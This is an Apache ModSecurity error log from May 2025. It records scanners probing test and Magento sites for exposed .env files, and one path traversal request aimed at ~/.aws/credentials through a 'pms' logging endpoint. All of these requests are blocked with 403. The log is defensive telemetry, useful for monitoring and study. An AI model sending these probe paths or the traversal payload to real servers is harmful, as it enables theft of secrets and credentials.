[Sun May 04 14:00:40.523421 2025] [:error] [pid 2912448] [client 170.39.218.52:35104] [client 170.39.218.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aBdW6G8SHJtYYpgVqYEQHAAAAAc"]
[Sun May 04 14:00:40.523594 2025] [:error] [pid 2912448] [client 170.39.218.52:35104] [client 170.39.218.52] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aBdW6G8SHJtYYpgVqYEQHAAAAAc"]
[Sun May 04 14:00:41.903452 2025] [authz_core:error] [pid 2912449] [client 170.39.218.52:57074] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Sun May 04 14:00:41.977955 2025] [:error] [pid 2912448] [client 170.39.218.52:57088] [client 170.39.218.52] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aBdW6W8SHJtYYpgVqYEQHQAAAAc"]
[Sun May 04 14:00:41.978225 2025] [:error] [pid 2912448] [client 170.39.218.52:57088] [client 170.39.218.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aBdW6W8SHJtYYpgVqYEQHQAAAAc"]
[Sun May 04 14:00:41.978457 2025] [:error] [pid 2912448] [client 170.39.218.52:57088] [client 170.39.218.52] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aBdW6W8SHJtYYpgVqYEQHQAAAAc"]
[Mon May 05 08:04:28.508904 2025] [:error] [pid 2935319] [client 154.83.103.201:37062] [client 154.83.103.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aBhU7EFFcUAIThSFZD6dKgAAAAg"]
[Mon May 05 08:04:28.509202 2025] [:error] [pid 2935319] [client 154.83.103.201:37062] [client 154.83.103.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aBhU7EFFcUAIThSFZD6dKgAAAAg"]
[Mon May 05 08:04:28.509387 2025] [:error] [pid 2935319] [client 154.83.103.201:37062] [client 154.83.103.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aBhU7EFFcUAIThSFZD6dKgAAAAg"]
[Mon May 05 08:04:28.529453 2025] [:error] [pid 2935319] [client 154.83.103.201:37062] [client 154.83.103.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aBhU7EFFcUAIThSFZD6dKwAAAAg"]
[Mon May 05 08:04:28.529727 2025] [:error] [pid 2935319] [client 154.83.103.201:37062] [client 154.83.103.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aBhU7EFFcUAIThSFZD6dKwAAAAg"]
[Mon May 05 08:04:28.529896 2025] [:error] [pid 2935319] [client 154.83.103.201:37062] [client 154.83.103.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aBhU7EFFcUAIThSFZD6dKwAAAAg"]
[Mon May 05 08:04:28.550090 2025] [:error] [pid 2935319] [client 154.83.103.201:37062] [client 154.83.103.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aBhU7EFFcUAIThSFZD6dLAAAAAg"]
[Mon May 05 08:04:28.550359 2025] [:error] [pid 2935319] [client 154.83.103.201:37062] [client 154.83.103.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aBhU7EFFcUAIThSFZD6dLAAAAAg"]
[Mon May 05 08:04:28.550543 2025] [:error] [pid 2935319] [client 154.83.103.201:37062] [client 154.83.103.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aBhU7EFFcUAIThSFZD6dLAAAAAg"]
[Mon May 05 08:04:28.570623 2025] [:error] [pid 2935319] [client 154.83.103.201:37062] [client 154.83.103.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aBhU7EFFcUAIThSFZD6dLQAAAAg"]
[Mon May 05 08:04:28.570846 2025] [:error] [pid 2935319] [client 154.83.103.201:37062] [client 154.83.103.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aBhU7EFFcUAIThSFZD6dLQAAAAg"]
[Mon May 05 08:04:28.571019 2025] [:error] [pid 2935319] [client 154.83.103.201:37062] [client 154.83.103.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aBhU7EFFcUAIThSFZD6dLQAAAAg"]
[Mon May 05 08:04:28.591489 2025] [:error] [pid 2935319] [client 154.83.103.201:37062] [client 154.83.103.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /settings/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "aBhU7EFFcUAIThSFZD6dLgAAAAg"]
[Mon May 05 08:04:28.591739 2025] [:error] [pid 2935319] [client 154.83.103.201:37062] [client 154.83.103.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "aBhU7EFFcUAIThSFZD6dLgAAAAg"]
[Mon May 05 08:04:28.591933 2025] [:error] [pid 2935319] [client 154.83.103.201:37062] [client 154.83.103.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "aBhU7EFFcUAIThSFZD6dLgAAAAg"]
[Mon May 05 16:47:59.241492 2025] [:error] [pid 2935311] [client 154.83.103.202:10514] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aBjPn3UF-8yTllqnswFjNwAAAAA"]
[Mon May 05 16:47:59.241832 2025] [:error] [pid 2935311] [client 154.83.103.202:10514] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aBjPn3UF-8yTllqnswFjNwAAAAA"]
[Mon May 05 16:47:59.242042 2025] [:error] [pid 2935311] [client 154.83.103.202:10514] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aBjPn3UF-8yTllqnswFjNwAAAAA"]
[Mon May 05 16:47:59.262004 2025] [:error] [pid 2935311] [client 154.83.103.202:10514] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aBjPn3UF-8yTllqnswFjOAAAAAA"]
[Mon May 05 16:47:59.262196 2025] [:error] [pid 2935311] [client 154.83.103.202:10514] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aBjPn3UF-8yTllqnswFjOAAAAAA"]
[Mon May 05 16:47:59.262392 2025] [:error] [pid 2935311] [client 154.83.103.202:10514] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aBjPn3UF-8yTllqnswFjOAAAAAA"]
[Mon May 05 16:47:59.282381 2025] [:error] [pid 2935311] [client 154.83.103.202:10514] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aBjPn3UF-8yTllqnswFjOQAAAAA"]
[Mon May 05 16:47:59.282641 2025] [:error] [pid 2935311] [client 154.83.103.202:10514] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aBjPn3UF-8yTllqnswFjOQAAAAA"]
[Mon May 05 16:47:59.282797 2025] [:error] [pid 2935311] [client 154.83.103.202:10514] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aBjPn3UF-8yTllqnswFjOQAAAAA"]
[Mon May 05 16:47:59.302832 2025] [:error] [pid 2935311] [client 154.83.103.202:10514] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aBjPn3UF-8yTllqnswFjOgAAAAA"]
[Mon May 05 16:47:59.303023 2025] [:error] [pid 2935311] [client 154.83.103.202:10514] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aBjPn3UF-8yTllqnswFjOgAAAAA"]
[Mon May 05 16:47:59.303171 2025] [:error] [pid 2935311] [client 154.83.103.202:10514] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aBjPn3UF-8yTllqnswFjOgAAAAA"]
[Mon May 05 16:47:59.323260 2025] [:error] [pid 2935311] [client 154.83.103.202:10514] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /settings/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "aBjPn3UF-8yTllqnswFjOwAAAAA"]
[Mon May 05 16:47:59.323466 2025] [:error] [pid 2935311] [client 154.83.103.202:10514] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "aBjPn3UF-8yTllqnswFjOwAAAAA"]
[Mon May 05 16:47:59.323631 2025] [:error] [pid 2935311] [client 154.83.103.202:10514] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "aBjPn3UF-8yTllqnswFjOwAAAAA"]
[Tue May 06 14:10:25.404287 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/pms"] [unique_id "aBn8MQkYV-vARAMMZzPByAAAAAU"]
[Tue May 06 14:10:25.404396 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/pms"] [unique_id "aBn8MQkYV-vARAMMZzPByAAAAAU"]
[Tue May 06 14:10:25.404457 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/pms"] [unique_id "aBn8MQkYV-vARAMMZzPByAAAAAU"]
[Tue May 06 14:10:25.405363 2025] [:error] [pid 2955450] [client 94.26.90.191:46848] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/pms"] [unique_id "aBn8MQkYV-vARAMMZzPByAAAAAU"]
